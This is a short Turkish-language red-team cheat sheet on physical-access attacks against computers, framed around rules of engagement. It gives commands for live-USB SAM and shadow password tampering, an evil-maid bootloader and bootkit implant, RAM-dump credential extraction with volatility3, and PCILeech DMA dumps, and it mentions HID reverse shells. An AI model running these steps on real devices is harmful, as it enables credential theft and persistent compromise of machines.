Physical Attacks
hardware physical
Kısa fiziksel erişimde hedef: disk şifresini atlatmak değilse bile oturum, credential cache veya boot zincirinden dayanak üretmektir.
Metodoloji
Section titled “Metodoloji”-
Cihaz durumunu gözlemle (kilitli, BitLocker/FileVault, BIOS şifresi, USB boot).
-
En ucuz vektörü seç: açık oturum HID, boot menü, outbound Ethernet.
-
Live ortam veya evil maid ile kimlik/loot topla.
-
Erişim kanıtını paketle; iz bırakmayı RoE’ye göre yönet.
Boot yüzeyi
Section titled “Boot yüzeyi”# Live USB ile boot (BitLocker yok / recovery key var varsayımı)lsblk -fmount /dev/sda2 /mntcat /mnt/Windows/System32/config/SAMchntpw -i /mnt/Windows/System32/config/SAM# Linux: shadow sıfırlamapasswd rootBIOS şifresi + Secure Boot + disk crypto = boot menü tek başına yetmezEvil maid
Section titled “Evil maid”# Initramfs / EFI implant lab örneğicp evil.efi /mnt/EFI/BOOT/BOOTX64.EFIdd if=bootkit.img of=/dev/sdX bs=4M status=progressSonraki boot'ta credential logger / reverse shellCold boot / bellek
Section titled “Cold boot / bellek”# Laboratuvar: RAM dump sonrasıvolatility3 -f mem.dmp windows.hashdumpvolatility3 -f mem.dmp windows.credsstrings mem.dmp | rg -i 'password|BEGIN RSA|AKIA'Kısa erişim checklist vektörleri
Section titled “Kısa erişim checklist vektörleri”Açık masaüstü → HID reverse shellEkran kilitli + USB boot açık → live OS lootEthernet jack → dropbox / reverse tunnel cihazıThunderbolt/DMA (eski) → PCILeechpcileech dump -out mem.rawChecklist
Section titled “Checklist”[ ] kilit / disk crypto / BIOS durumu not edildi[ ] HID veya boot vektörü denendi[ ] loot (SAM/shadow/key) alındı veya erişim kanıtlandı[ ] implant bırakıldıysa konum kaydedildi